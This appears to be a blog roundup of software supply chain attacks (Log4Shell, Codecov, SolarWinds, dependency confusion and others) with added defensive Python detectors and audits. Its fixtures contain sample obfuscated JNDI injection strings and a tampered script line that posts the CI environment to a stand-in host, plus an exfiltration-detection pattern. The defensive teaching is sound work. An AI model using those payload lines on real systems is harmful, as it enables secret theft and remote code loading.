Compared with traditional security threats, supply chain threats propagate: a vulnerability in an upstream product affects every downstream consumer, so risk spreads along the supply chain and the overall attack surface grows accordingly.
In recent years several influential supply chain attacks have taken place, involving open-source components, public code repositories, cloud platforms and CI/CD services, among others.
Major media, logistics, and industrial companies in Germany were targeted with a series of malicious NPM packages carrying backdoor code, delivered through dependency confusion. Researchers believed the attack was highly targeted and depended on insider information that is hard to obtain. The German penetration testing company Code White later claimed responsibility, explaining that it was part of an attack simulation for its clients; kudos to them on the elaborate attack.
Following the protestware incident in node-ipc, an NPM package with millions of weekly downloads, another developer followed suit. On March 17, the Russian developer Viktor Mukhachev added an anti-war code segment to his popular NPM package event-source-polyfill. The code, shipped in version 1.0.26, shows an anti-war message after a 15-second delay to every user in Russia who opens an application built with the package.
An attacker registered a series of packages in the NPM registry whose names mimic Azure packages (typosquatting) and filled them with malicious code, targeting the supply chains of Azure developers.
Open-Source Components, Code Injection
node-ipc is a widely used NPM open-source component. Its author poisoned the package for his personal political standpoint by adding a malicious JavaScript file that creates anti-war slogans on users' desktops. Further investigation revealed that the author had also shipped code that overwrites user data on machines geolocated to Russia or Belarus. Unity Hub, Vue CLI, and other widely used third-party software depended on the package and were affected.
Open-Source Components, Code Injection
Marak Squires, the main developer of two widely used NPM packages, faker.js and colors.js, emptied the faker repository on GitHub and pushed updates containing sabotage code (functions that print gibberish) to the NPM registry, in protest at receiving no compensation for maintaining the projects. Numerous applications, including aws-cdk, were affected, triggering a heated discussion about how the maintainers of open-source ecosystems and projects are rewarded.
Open-Source Components, Software Vulnerabilities
Apache Log4j2 is an open-source logging library, the successor to Log4j, and is widely used in development, test and production. It supports lookups: placeholders of the form ${...} inside a log message are resolved and substituted when the message is formatted. One lookup type resolves values through JNDI, and because the lookup target is taken from the logged string without filtering, any attacker-controlled value that ends up in a log line (a User-Agent header, a username) can make the application connect to an attacker's server and load its classes: a JNDI injection (Log4Shell, CVE-2021-44228). Because Log4j2 is so widely used, the impact was enormous. As supply chain links multiply and software structures grow more complex, such vulnerabilities become harder to identify and fix, especially in projects that pull the component in only transitively. The common follow-on attacks observed have been ransomware, cryptomining and botnet recruitment (including DDoS).
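The detection side of the lookup mechanism described above, as an added example that is not from the original post or from the Log4j project: the script collapses the nested-lookup obfuscations attackers used to evade plain "${jndi:" matching (${lower:j}, ${::-j}, ${env:NaN:-j}) and then extracts the callback protocol and host. The log lines are constructed for the example; the hosts in them are documentation addresses, not real infrastructure.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines for this example (not captured traffic): three
# Log4Shell-style probes using different lookup obfuscations, and one benign request.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.77:1389/a}"',
    '203.0.113.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.78/x}"',
    '203.0.113.7 - - "GET /?q=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.79:1099/o} HTTP/1.1" 404',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# An innermost lookup: ${...} with no further ${ or } inside.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The canonical form we want to spot once the wrappers are stripped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)\s*://\s*([^/\s}]+)", re.IGNORECASE)


def _resolve_wrapper(m) -> str:
    """Collapse one obfuscation wrapper the way Log4j's own substitution would."""
    body = m.group(1)
    if ":-" in body:                     # ${env:NaN:-j} or ${::-j} -> default value "j"
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return m.group(0)                    # a real lookup such as ${jndi:...}: keep it


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly strip nested wrappers so '${jndi:' is visible to a plain match."""
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(_resolve_wrapper, text)
        if resolved == text:
            return text
        text = resolved
    return text


def detect_log4shell(line: str) -> Optional[Tuple[str, str]]:
    """Return (protocol, callback host[:port]) if the line carries a JNDI lookup, else None."""
    m = _JNDI.search(normalize_lookups(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line index, protocol, callback target) for every line that contains a probe."""
    hits = []
    for i, line in enumerate(lines):
        hit = detect_log4shell(line)
        if hit:
            hits.append((i, hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    for idx, proto, target in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: JNDI lookup via {proto} to {target}")
```

The normalization step is the part worth keeping: a rule that matches the literal string "${jndi:" catches only the first sample line. The callback host it extracts is the indicator to block and to search for in outbound connection logs. Detection is not a fix; the fix is upgrading to a patched Log4j2 release in every project that ships the library, directly or transitively.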
Microsoft's Azure Container-as-a-Service platform (Azure Container Instances, ACI) had a cross-account takeover vulnerability caused by an outdated runC (v1.0.0-rc2). An attacker could escape from their own container to the underlying node, gain control of the Kubernetes cluster hosting other customers' containers, execute code in those containers and access their data.
An attacker committed malicious code to a company's private GitHub repository, changing the front end of its auction site so that the payment wallet address was replaced with the attacker's own. The root cause was that branch protection rules were not enforced on the repository, so a commit could land on the deployed branch without review.
Realtek's WiFi module SDK contains several vulnerabilities, including command injection, memory corruption in its HTTP server, and flaws in its custom web services. Attackers can exploit them to fully compromise affected devices and execute arbitrary code with the highest privileges.
Code Injection, IT Management Platform, Downstream Impact
The REvil ransomware gang carried out attacks on several Managed Service Providers (MSPs). Investigations revealed that all of them used Kaseya VSA, a product for unified remote monitoring and management of customer endpoints. After compromising VSA servers, the attackers used the product's own update mechanism to deliver malicious code, infecting more than 1,500 downstream organizations.
All Pling-based free and open-source software marketplaces on Linux shared a weakness: the PlingStore desktop application runs a local WebSocket server, and because browsers do not apply the same-origin policy to WebSocket connections, any website a user visits could connect to it unless the server checked the Origin header itself, which it did not. Attackers could use this to reach remote code execution, and the same platforms carried a stored XSS usable for worm-style attacks.
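The handshake at the heart of the Pling issue, as an added example that is not from the original post or from the Pling project: two versions of a local WebSocket server's upgrade handler, one that accepts any page and one that rejects unknown origins before completing the RFC 6455 handshake. The requests, the origins and the allow-list are constructed for the example; the Sec-WebSocket-Key is the RFC's own test value.

```python
import base64
import hashlib
from typing import Dict, FrozenSet, Tuple

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed by RFC 6455

# Constructed upgrade requests for this example. A browser always attaches the
# Origin of the page that opened the socket; the local server sees nothing else.
LEGIT_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 127.0.0.1:8080\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Origin: https://store.example\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n\r\n"
)
ATTACKER_REQUEST = LEGIT_REQUEST.replace("https://store.example", "https://attacker.example")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Header names lower-cased; the request line is dropped."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def websocket_accept_value(client_key: str) -> str:
    """Sec-WebSocket-Accept per RFC 6455 section 4.2.2: base64(sha1(key + GUID))."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def handshake_without_origin_check(headers: Dict[str, str]) -> Tuple[int, Dict[str, str]]:
    """The flawed pattern: any page that can reach localhost gets a session."""
    key = headers.get("sec-websocket-key")
    if headers.get("upgrade", "").lower() != "websocket" or not key:
        return 400, {}
    return 101, {
        "Upgrade": "websocket",
        "Connection": "Upgrade",
        "Sec-WebSocket-Accept": websocket_accept_value(key),
    }


def handshake_with_origin_check(headers: Dict[str, str],
                                allowed_origins: FrozenSet[str]) -> Tuple[int, Dict[str, str]]:
    """Browsers send Origin but do not enforce the same-origin policy for WebSockets,
    so a local service must reject unknown origins itself before finishing the handshake."""
    origin = headers.get("origin")
    if origin is None or origin not in allowed_origins:
        return 403, {}
    return handshake_without_origin_check(headers)


if __name__ == "__main__":
    allowed = frozenset({"https://store.example"})
    for label, raw in (("legitimate page", LEGIT_REQUEST), ("attacker page", ATTACKER_REQUEST)):
        hdrs = parse_headers(raw)
        print(label, "unchecked ->", handshake_without_origin_check(hdrs)[0],
              "| checked ->", handshake_with_origin_check(hdrs, allowed)[0])
```

An Origin allow-list is the minimum; a local service that can download and execute code should additionally require a per-session secret that only the legitimate front end knows, since a non-browser client can send any Origin it likes.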
May 2021 Information Breach
Colonial Pipeline is one of the largest fuel pipeline operators in the United States. Using a Colonial Pipeline VPN account whose password had leaked to the dark web (and which had no multi-factor authentication), the DarkSide criminal group entered the company's network, stole a large volume of data and deployed ransomware, eventually forcing the company to pay approximately $4.4 million.
CI/CD, Basic Image
A flaw in the process Codecov, a code coverage testing company, used to build its Docker images let an attacker obtain a credential and modify the product's Bash Uploader script. The altered script sent sensitive information from customers' Continuous Integration (CI) environments, such as credentials, tokens and repository details, to the attacker's server.
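The check a CI pipeline should perform on any remotely fetched script before piping it to a shell, as an added example that is not from the original post or from Codecov: compare the script against a pinned digest recorded when it was reviewed, and, on a mismatch, show which lines dump the process environment into a network call. The two scripts, the attacker host and the digest are constructed for the example; in a real pipeline the digest is a literal committed next to the pipeline configuration.

```python
import hashlib
import re
from typing import List

# Constructed stand-in for a remotely fetched uploader script (not Codecov's real script).
TRUSTED_UPLOADER = (
    b"#!/bin/bash\n"
    b"set -e\n"
    b"echo 'uploading coverage report'\n"
    b"curl -sS https://uploader.example/upload --data-binary @coverage.xml\n"
)
# Constructed tampered copy: one extra line that ships the whole CI environment
# (tokens, cloud keys, repository credentials) to an attacker-controlled host.
TAMPERED_UPLOADER = TRUSTED_UPLOADER + b'curl -sm 0.5 -d "$(env)" https://203.0.113.9/upload\n'

# In a real pipeline this digest is a literal committed alongside the pipeline config,
# recorded when the script was reviewed; here it is computed so the example is self-contained.
PINNED_SHA256 = hashlib.sha256(TRUSTED_UPLOADER).hexdigest()

# Secondary signal only: shell that hands the environment to a command that sends it off-host.
_ENV_EXFIL = re.compile(rb"\$\(\s*(?:env|printenv)\s*\)|`\s*(?:env|printenv)\s*`|\benv\s*\|\s*curl")


def digest_matches(script: bytes, pinned_sha256: str) -> bool:
    return hashlib.sha256(script).hexdigest() == pinned_sha256


def suspicious_lines(script: bytes) -> List[str]:
    """Lines that dump the process environment into something that can transmit it."""
    return [ln.decode("utf-8", "replace") for ln in script.splitlines() if _ENV_EXFIL.search(ln)]


def ci_gate(script: bytes, pinned_sha256: str) -> str:
    """Decide whether a fetched script may run. The digest is the control; the pattern
    scan only explains a mismatch, it must never be the reason a script is allowed."""
    if not digest_matches(script, pinned_sha256):
        bad = suspicious_lines(script)
        reason = f"digest mismatch; exfiltration pattern in: {bad[0]!r}" if bad else "digest mismatch"
        return "reject: " + reason
    return "run"


if __name__ == "__main__":
    print(ci_gate(TRUSTED_UPLOADER, PINNED_SHA256))
    print(ci_gate(TAMPERED_UPLOADER, PINNED_SHA256))
```

Pinning by digest means every upstream release of the script is a deliberate, reviewed change to the pipeline rather than something that silently arrives at the next build. Vendoring the script into the repository achieves the same effect with less ceremony.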
Information Breach, Downstream Impact
The camera database of the Silicon Valley start-up Verkada was breached, exposing live feeds from around 150,000 surveillance cameras. The root cause was that the username and password of a super-admin account had been exposed on the internet.
Public Code Repository, Code Implantation
PHP's self-hosted git infrastructure, the git.php.net server, was compromised. Two malicious commits were pushed to the php-src repository under the names of project maintainers, implanting a backdoor that executed attacker-supplied code whenever an HTTP request to a site running the affected build carried a specially crafted header.
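Two checks that correspond to the auction-site incident (branch protection not enforced) and to the git.php.net incident (commits pushed under maintainers' names), as an added example that is not from the original post or from GitHub or PHP: an audit of a branch's protection settings against a baseline, and a scan of signature status in git log output for commits that claim a trusted author without a good signature. The protection objects are constructed for the example and only modeled on the field names of GitHub's branch-protection API response; the git log lines and author names are constructed too.

```python
from typing import Dict, List, Optional

# Constructed samples modeled on the shape of GitHub's branch-protection API response
# (GET /repos/{owner}/{repo}/branches/{branch}/protection); the objects are assumptions
# for this example, not captured responses.
WEAK_PROTECTION = {
    "enforce_admins": {"enabled": False},
    "required_signatures": {"enabled": False},
    "allow_force_pushes": {"enabled": True},
    "allow_deletions": {"enabled": False},
}
STRONG_PROTECTION = {
    "required_pull_request_reviews": {"required_approving_review_count": 2,
                                      "dismiss_stale_reviews": True},
    "required_status_checks": {"strict": True, "contexts": ["ci/test"]},
    "enforce_admins": {"enabled": True},
    "required_signatures": {"enabled": True},
    "allow_force_pushes": {"enabled": False},
    "allow_deletions": {"enabled": False},
}

# Constructed output of `git log --format='%H %G? %an'` on a release branch.
# %G? is git's signature status: G good, N no signature, B bad, E missing key, U untrusted.
SAMPLE_GIT_LOG = """\
a1f3c9d G Alice Maintainer
b7e2d44 N Alice Maintainer
c9a0e11 G Bob Maintainer
d4b8f02 B Bob Maintainer
"""
TRUSTED_AUTHORS = {"Alice Maintainer", "Bob Maintainer"}


def audit_branch_protection(protection: Optional[Dict]) -> List[str]:
    """Findings against a baseline: reviews required, no admin bypass, signed commits,
    no force-push or deletion. None means the branch has no rule at all."""
    if protection is None:
        return ["no branch protection rule: anyone with write access can push directly"]
    findings = []
    reviews = protection.get("required_pull_request_reviews")
    if not reviews or reviews.get("required_approving_review_count", 0) < 1:
        findings.append("pull request review not required: direct pushes reach the branch")
    if not protection.get("required_status_checks", {}).get("contexts"):
        findings.append("no required status checks")
    if not protection.get("enforce_admins", {}).get("enabled"):
        findings.append("administrators can bypass the rules")
    if not protection.get("required_signatures", {}).get("enabled"):
        findings.append("unsigned commits accepted: an author name can be forged")
    if protection.get("allow_force_pushes", {}).get("enabled"):
        findings.append("force-push allowed: history can be rewritten")
    if protection.get("allow_deletions", {}).get("enabled"):
        findings.append("branch deletion allowed")
    return findings


def unverified_commits(git_log: str, trusted_authors) -> List[str]:
    """Commits that claim a trusted author but carry no good signature: what a forged
    maintainer commit looks like on the server side."""
    bad = []
    for line in git_log.splitlines():
        sha, status, author = line.split(" ", 2)
        if author in trusted_authors and status != "G":
            bad.append(f"{sha} ({status}) {author}")
    return bad


if __name__ == "__main__":
    for name, rule in (("weak", WEAK_PROTECTION), ("strong", STRONG_PROTECTION)):
        print(name, audit_branch_protection(rule))
    print(unverified_commits(SAMPLE_GIT_LOG, TRUSTED_AUTHORS))
```

The author field of a commit is free text; only a signature verified against a key you already associate with that maintainer ties a commit to a person, which is why the signature check belongs on the server or in the protection rule rather than in reviewers' eyes.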
Open-Source Components, Dependency Confusion
Security researcher Alex Birsan gained code execution inside the internal networks of 35 major IT companies, including Microsoft, Apple, PayPal, Tesla and Uber, by exploiting a weakness in how package managers resolve names (dependency confusion): when an internal package name also exists on the public registry, the build tooling may fetch the public one, especially if its version number is higher.
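One audit that covers the three naming attacks in this list, the Code White and Birsan dependency-confusion cases and the Azure typosquatting case, as an added example that is not from the original post or from any of the researchers named: given a project's dependency list, flag private names that also resolve on the public registry (and whether the public version would win), unscoped twins of scoped packages, and names within one or two edits of a popular package. All package names, versions and registries are constructed for the example.

```python
from typing import Dict, List, Tuple

# Constructed inputs for this example: the organisation's private packages with the
# versions on its internal registry, the public registry's latest versions, a short
# list of popular public packages, and one project's dependency list.
INTERNAL_PACKAGES = {"corp-internal-utils": "1.2.0", "corp-auth-client": "3.0.1"}
PUBLIC_INDEX = {"corp-internal-utils": "99.0.0", "lodash": "4.17.21",
                "@azure/storage-blob": "12.12.0"}
POPULAR_PUBLIC = ["lodash", "express", "@azure/storage-blob", "@azure/identity"]
PROJECT_DEPENDENCIES = {
    "corp-internal-utils": "^1.2.0",
    "corp-auth-client": "^3.0.0",
    "lodahs": "^1.0.0",
    "azure-storage-blob": "^0.0.1",
    "@azure/storage-blob": "^12.12.0",
    "express": "^4.18.2",
}


def version_tuple(version: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in version.lstrip("^~").split("."))


def levenshtein(a: str, b: str) -> int:
    """Edit distance; one or two edits from a popular name is the typosquatter's budget."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def unscoped_twins(popular: List[str]) -> Dict[str, str]:
    """Names an attacker can register that mimic a scoped package: '@azure/x' -> 'x', 'azure-x'."""
    twins = {}
    for pkg in popular:
        if pkg.startswith("@"):
            scope, _, name = pkg[1:].partition("/")
            twins[name] = pkg
            twins[f"{scope}-{name}"] = pkg
    return twins


def audit_dependencies(deps: Dict[str, str], internal: Dict[str, str],
                       public_index: Dict[str, str], popular: List[str]) -> List[Tuple[str, str]]:
    findings = []
    twins = unscoped_twins(popular)
    for name in deps:
        # Dependency confusion: a private name that also resolves on the public registry.
        if name in internal and name in public_index:
            kind = "dependency confusion"
            if version_tuple(public_index[name]) > version_tuple(internal[name]):
                kind += " (public version is higher and would win)"
            findings.append((name, kind))
            continue
        # Typosquat of a scoped package by dropping or flattening the scope.
        if name in twins:
            findings.append((name, f"unscoped twin of {twins[name]}"))
            continue
        # Near-miss of a popular name; allow two edits only for longer names.
        limit = 2 if len(name) >= 6 else 1
        for pkg in popular:
            if name != pkg and levenshtein(name, pkg) <= limit:
                findings.append((name, f"typosquat candidate for {pkg}"))
                break
    return findings


if __name__ == "__main__":
    for name, kind in audit_dependencies(PROJECT_DEPENDENCIES, INTERNAL_PACKAGES,
                                         PUBLIC_INDEX, POPULAR_PUBLIC):
        print(f"{name}: {kind}")
```

The structural fix for the confusion case is to publish internal packages under a scope and bind that scope to the internal registry (for npm, a line such as `@corp:registry=https://...` in .npmrc), so the resolver never consults the public registry for those names; registering the same names publicly as placeholders closes the remaining gap.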
Cloud Security, Downstream Impact
Mimecast provides cloud security and risk management services for email and enterprise information. In January 2021 it was disclosed that an attacker had compromised a certificate Mimecast issued to customers for authenticating its products to Microsoft 365, which could let the attacker intercept those connections and steal information.
Software Supplier, Downstream Impact
SolarWinds suffered a supply chain attack by a state-sponsored APT group, seriously affecting a very large number of customers across U.S. industries. The attack proceeded as follows: 1) the attackers first breached SolarWinds itself; 2) they tampered with the Orion build to plant a backdoor, then signed the backdoored components with SolarWinds' legitimate code-signing certificate so that they shipped as a normal update; 3) inside the victims' networks they surveyed the environment, identified weaknesses, escalated privileges and moved laterally to reach and collect data. Possible techniques for the initial compromise include social engineering, brute-force attacks and zero-day exploitation.
Code Injection, Downstream Impact
Hackers compromised the Vietnam Government Certification Authority (VGCA) and implanted a backdoor in its client application. The backdoor can receive plug-ins and retrieve the victim's proxy configuration, which it uses to reach its C&C server and execute commands. An earlier version of the same backdoor family, PhantomNet, had been observed in the Philippines.
Software Vulnerabilities, Password Managers, Digital Certificates
WIZVERA VeraPort is an integrated installation tool developed in South Korea that helps users manage the security software required to visit government and banking websites. During installation, the software only checks that the downloaded binary carries a valid digital signature; it does not verify who signed it or where it came from. The Lazarus group exploited this by signing malware with stolen code-signing certificates and serving it from compromised sites that support VeraPort, so that visiting users downloaded and ran the malware.
Previous posts on software supply chain security: